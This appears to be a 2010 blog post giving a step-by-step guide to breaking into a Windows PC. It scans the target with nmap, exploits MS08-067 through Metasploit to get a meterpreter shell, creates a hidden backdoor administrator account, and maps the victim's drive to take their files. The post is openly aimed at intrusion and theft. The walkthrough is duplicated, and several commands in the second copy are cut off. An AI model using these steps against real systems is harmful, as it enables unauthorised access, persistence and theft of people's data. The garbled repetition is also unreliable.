Wednesday, April 28, 2010
Monday, April 26, 2010
hack the target system
Main Part:
- We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the avaliable exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victims ip: “set RHOST”
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\\C mypass /user:n0f4t3″ and hit ENTER.
- If that doesn’t work type “net use X: \\\C: mypass /user:n0f4t3″ and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
- On the terminal we write: nmap -sS -O
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the avaliable exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victims ip: “set RHOST
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\
- If that doesn’t work type “net use X: \\
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
That’s all Folks!!!
Friday, April 23, 2010
Thursday, April 22, 2010
Wednesday, April 14, 2010
Monday, April 5, 2010
Saturday, April 3, 2010
english/linux books
http://career-assessments.blogspot.com/2008/01/red-hat-linux-certification-program_26.html
Friday, April 2, 2010
Subscribe to:
Posts
(
Atom
)